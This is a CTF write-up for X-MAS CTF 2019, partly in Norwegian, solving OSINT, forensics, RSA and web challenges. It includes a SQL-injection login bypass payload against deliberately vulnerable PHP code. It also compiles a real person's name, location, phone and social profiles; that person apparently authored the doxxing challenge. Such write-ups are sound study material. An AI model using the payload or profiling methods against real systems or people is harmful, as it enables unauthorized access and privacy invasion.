# X-MAS CTF 2019 # !Sanity Checks ## 1 - Merry Christmas! :::success :+1: oklien ::: > Here is your first X-MAS CTF flag: Sto på siden: Flag: `X-MAS{HoHoHo__W3lc0me_T0_X-MAS_CTF_2019!}` ## 5 - Santa's Secret Club :::success :+1: oklien ::: > Join our Discord server in order to stay up-to-date with the competition! There you can form teams, chat with the organizers and follow challenge releases with ease: Invite link: https://discord.gg/9dwXTKF Topic: ``` Merry Christmas! X-MAS CTF Starts on 13th of december X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s} ``` Flag: `X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}` # osint ## 25 - Bobi's wHack :::success :+1: oklien ::: > Well.... as far as we know he's uploading some walkthroughs from his OSCP Journey; show him some support ;) *subscribe pls ;3* Google søk, fant youtube -> about page * https://www.youtube.com/channel/UCskRBTQUbl8jqCmxFoEtqOA/about Flag: `X-MAS{subscribelikesharethanks-bobi:)}` ## 50 - Dox the Yak :::success :+1: oklien ::: > Santa had some trouble getting info about a weird internet dude nicknamed yakuhito. Help him answer the following questions and you will be rewarded ;) * Question #1: What's yakuhito's dream car? * Question #2: What's yakuhito's real name? * Question #3: What phone model is yakuhito currently using? > Example flag: X-MAS{ch3vrolet_corvett3_john_doe_galaxyj7pro} > Note: The car's model must be written in leetspeak > Author: yakuhito * https://www.reddit.com/r/KeybaseProofs/comments/c969d6/my_keybase_proof_reddityakuhito_keybaseyakuhito/?ref=readnext * https://www.reddit.com/user/yakuhito https://keybase.io/yakuhito Navn: Mihai Dancaescu https://keybase.io/yakuhito/devices https://github.com/Yakuhito/phonemodel/commit/6a6b8d18f7affe43cb54eef79625bf05f373695e#comments mobil: OnePlus Model 7 commit melding Update README.md Pro version twitter viser også at han bruker android drømmebil: https://www.youtube.com/channel/UChvAolOWaKdAVCXmPUpi8qA/discussion trupples 3 days ago what car do you like sir 3 Empereur Paradis Empereur Paradis 21 hours ago Everyone is searching the most wanted car 🤣 doh :p følger tesla og elon musk på twitter @yakuh1t0 Can't wait to buy a T3SL@ and test those! Cyb3rtruck :P fant twitter thread... annet: https://www.offensive-security.com/offsec/meet-mihai-16-year-old-oscp-holder/ Bucharest, Romania https://github.com/Yakuhito kuhi.to https://ro.linkedin.com/in/mihai-dancaescu-668a2a177?trk=public_profile_samename_profile_profile-result-card_result-card_full-click InfoSec Enthusiast | CTF Player @ HTsP | CEH, OSCP ONPLUS ER TYDELIGVIS MODELL NAVNET... !"#%¤¤# Flag: `X-MAS{t3sl@_cyb3rtruck_mihai_dancaescu_oneplus7pro}` ## 175 - Dox the Grinch :::danger :-1: oklien ::: > I found this guy on the internet who says that he hates Christmas! Unbelievable. Can you find out more info about him? > Flag format is X-MAS{name_surname_city_favouriteColor_bloodType_height} For example, X-MAS{george_lucas_newyork_blue_A+_184} * https://notabug.io/t/whatever/comments/44530e6b7740f22940db9c176b621900d0bce697/i-hate-xmas har en post om hacker news https://news.ycombinator.com/user?id=Domay1986 Hello, my name is Eugene and I am interested in finances. I strongly believe that christmas is a scam. They closed my twitter account! See interesting posts I reply to on notabug.io: https://notabug.io/user/uIUP3NZDQVnKkISlVdjM0cSOwt_5EKu1g3CzQGmtTSc.VlYirh-sCV0rZ_6px0em8HWyeKZN8TMnTtY2l0YtoTA Business Inquires: domay1986 (at) hotmail.com * Brukernavn: Domay1986 * Fornavn: Eugene * E-post: domay1986@hotmail.com * Interesser: Finances, Christmas is a scam konto slettet https://twitter.com/Domay1986 https://www.instagram.com/domay1986/ qehbesem ^? kaffe på kurdisk... en følger https://www.instagram.com/jhnsmth25/ john Flag: `X-MAS{?_?_?_?_?_?} ` # forensics ## 25 - Santa's Forensics 101 :::success :+1: oklien ::: > Santa needs the help of an experienced forensics analyst. But first, he has to make sure that you are worthy. ```shell= oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ exiftool X-MAS_Flag2.png ExifTool Version Number : 10.80 File Name : X-MAS_Flag2.png Directory : . File Size : 602 kB File Modification Date/Time : 2019:12:13 20:15:39+01:00 File Access Date/Time : 2019:12:13 20:15:41+01:00 File Inode Change Date/Time : 2019:12:16 02:00:31+01:00 File Permissions : rw-r--r-- File Type : ZIP File Type Extension : zip MIME Type : application/zip Zip Required Version : 20 Zip Bit Flag : 0 Zip Compression : None Zip Modify Date : 2019:12:08 20:39:23 Zip CRC : 0x00000000 Zip Compressed Size : 0 Zip Uncompressed Size : 0 Zip File Name : hidden_data_dt/ oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ file X-MAS_Flag2.png X-MAS_Flag2.png: Zip archive data, at least v2.0 to extract oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ unzip X-MAS_Flag2.png Archive: X-MAS_Flag2.png warning [X-MAS_Flag2.png]: 308188 extra bytes at beginning or within zipfile (attempting to process anyway) creating: hidden_data_dt/ inflating: hidden_data_dt/logo2.png oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ exiftool hidden_data_dt/logo2.png ExifTool Version Number : 10.80 File Name : logo2.png Directory : hidden_data_dt File Size : 303 kB File Modification Date/Time : 2019:12:02 15:52:48+01:00 File Access Date/Time : 2019:12:16 02:01:19+01:00 File Inode Change Date/Time : 2019:12:16 02:01:09+01:00 File Permissions : rw-r--r-- File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 908 Image Height : 393 Bit Depth : 8 Color Type : RGB with Alpha Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced SRGB Rendering : Perceptual Gamma : 2.2 Pixels Per Unit X : 3779 Pixels Per Unit Y : 3779 Pixel Units : meters Warning : [minor] Trailer data after PNG IEND chunk Image Size : 908x393 Megapixels : 0.357 oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ zsteg hidden_data_dt/logo2.png [?] 32 bytes of extra data after image end (IEND), offset = 0x4ba1b extradata:0 .. text: "X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}" imagedata .. text: "ggg(llld" ``` Flag: `X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}` # Crypto ## 25 - Mata Nui's Cookies :::success :+1: oklien, ingeborg ::: > Well... Mata Nui said something about his beloved cookies, but I've never seen this language before. * Files: chall.png > Note: Please add brackets { } manually to the flag string. Flag is also uppercase. https://i.pinimg.com/736x/bb/05/19/bb0519cd945334846ca236fb2893ae30.jpg Matoran alphabet Flag: `X-MAS{MATANUIHASPREPAREDTHECOOKIES}` ## 50 - DeFUNct Ransomware :::warning :-1: oklien ::: > Santa got infected by a ransomware! His elves managed to extract the public key, but couldn't break it. Help Santa decrypt his memos and save Christmas! Files: download Author: yakuhito n: 795569463642685540507503580717531982215679866156448758181874864294322245115046429295501396806569726084791213843313411985306755767933614251017259685360119715465741448841742926933764058184678978561438979554324014291467144646477238464467422645352253054043072408503415623126059018449111807300294890437634529289983603557882115343971407081044050231310858245171002149317227947666679143716043142141154344524386085333349328691743473103727587822968025700198172293605188589348169121979328380110985341428872278372426313622759225108517531628814853640680656657769539723198346005032762702856464738405070059566116940640592020837592563966093405895649052241416909627641069000138027201809936286028443581259045590752809132011594533609186039058798304319124598876514669458750171121861029071117458575853963148168447032328126766812085206373608016609150982512467597800331177524543178311636877811255184421602626713179220562081413985985692847372669113031244726086691179028200044542399429299315486513734144695492816493025225952668485937918985944213972980220480476191347009337324778384697829597183756976186825413917475597248616769321954150777672675555280228376126308362907381766363071890237458517881243184612898247096962136202978853341989193954815333784856612689 e: 13337 ```shell= $ ./RsaCtfTool.py -n 795569463642685540507503580717531982215679866156448758181874864294322245115046429295501396806569726084791213843313411985306755767933614251017259685360119715465741448841742926933764058184678978561438979554324014291467144646477238464467422645352253054043072408503415623126059018449111807300294890437634529289983603557882115343971407081044050231310858245171002149317227947666679143716043142141154344524386085333349328691743473103727587822968025700198172293605188589348169121979328380110985341428872278372426313622759225108517531628814853640680656657769539723198346005032762702856464738405070059566116940640592020837592563966093405895649052241416909627641069000138027201809936286028443581259045590752809132011594533609186039058798304319124598876514669458750171121861029071117458575853963148168447032328126766812085206373608016609150982512467597800331177524543178311636877811255184421602626713179220562081413985985692847372669113031244726086691179028200044542399429299315486513734144695492816493025225952668485937918985944213972980220480476191347009337324778384697829597183756976186825413917475597248616769321954150777672675555280228376126308362907381766363071890237458517881243184612898247096962136202978853341989193954815333784856612689 -e 13337 --createpub > key.pub oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019/emu20$ cat key.pub -----BEGIN PUBLIC KEY----- MIICITANBgkqhkiG9w0BAQEFAAOCAg4AMIICCQKCAgEAwwJwa2Gst3uW3HbN54T3 Z3P30k6hIaiOIxYTEf6gJrdK4oQ895oVUHqBIHDXTI13a1eerZL5G6yI6u3ImjEZ IlgyqcwtL5zd+HVHdW28oYVbkFkD2fAJMZwEjcPeFaZM3vvbbOKuO/xs7yDLI/nZ 6AP0bY4ZzY1WzC/tqvnvwDUMSzvIblzCib04GgDUJstUG/7Q3nAnFY5T6wJGXqhU 9NmegO8XSr5SCIiJDGk6pZE9XNCktUFLPLU0rWJ3IU/HDF71ivjec8POnO7dgQGu saualz+2pE+u14KVXitZ1eoGmnPXCh6sEWoCdpiotdKlRTsr9FfskLvmmCVEqswi EqoKdPd+T2QGDqj2rMhyQ4x3mQR8UZJeCeBRt56ysbbr8q+c7ibTWDtKAUjIFzk3 G1Q175qYXPar4xeM+7w4WfGUvWxhkYDpAegMYiMYVSTrt2pK2/FEpPKNsMZzx6jN +HKIqfLI6k2FygZ+hZjeIPJlgSH2BQZ0ZBWYaxs5+IeRpqSedowQ8XgjyGb9cJjM gM+4MK/G70/amVinw3YY0XzzvLygRfS8g7d5IIOoitFOVgs7cQWRminOG+N8BC0B D8ToN3xUzHuxwbkrowaDWZ8ncumnwsSt+iL1T2rRkY+YEp8B/sZNflW6y3KdC66i aAWGjHOQGrTKYofM79IIz1ECAjQZ -----END PUBLIC KEY----- ``` # Web ## 25 - Sequel Fun > So I found this login page, but I forgot the credentials :( * Remote server: http://challs.xmas.htsp.ro:11006 ```shell= oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ GET http://challs.xmas.htsp.ro:11006/ | grep '<!--' <!-- ?source=1 --> oklien@oklien-thinkpad:~/Documents/ctf/x-mas-2019$ GET http://challs.xmas.htsp.ro:11006/?source=1 ``` ```php= <?php if (isset ($_GET['source'])) { show_source ("index.php"); die (); } ?> <head> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div class="container"> <?php include ("config.php"); if (isset ($_GET['user']) && isset ($_GET['pass'])) { $user = $_GET['user']; $pass = $_GET['pass']; if (strpos ($user, '1') === false && strpos ($pass, '1') === false) { $conn = new mysqli ($servername, $username, $password, $dbname); $result = mysqli_query ($conn, "SELECT * FROM users WHERE user='" . $user . "' AND pass='" . $pass . "'", MYSQLI_STORE_RESULT); // TO-DO: Remove elf:elf account if ($result === false) { echo "<b>Our servers have run into a query error. Please try again later.</b>"; } else { if ($result->num_rows !== 0) { $row = mysqli_fetch_array ($result, MYSQLI_ASSOC); echo "<h1>You are logged in as: " . $row["user"] . "</h1><br>"; echo "<b class='flag'>"; if ($row ["uid"] === "0") echo $flag; else echo "Welcome elf!"; echo "</b>"; } else { echo "<b>Login fail.</b>"; } } } else { echo "<b>I don't like the number 1 :(</b>"; } } else { echo '<form class="center"> <h1>Santa Login:</h1> <label>Username:</label> <input type="text" name="user" autocomplete="off"><br> <label>Password:</label> <input type="password" name="pass" autocomplete="off"><br> <input type="submit" value="Connect"> </form>'; } ?> </div> <br> <script src="/js/snow.js"></script> <!-- ?source=1 --> </body> ``` * kan ikke bruke 1 tall i user eller pass * logge inn med uid: 0 http://challs.xmas.htsp.ro:11006/?user=admin&pass=%27%20or%20%27%27=%27 You are logged in as: admin Flag: `X-MAS{S0_1_c4n_b3_4dmin_w1th0ut_7h3_p4ssw0rd?}`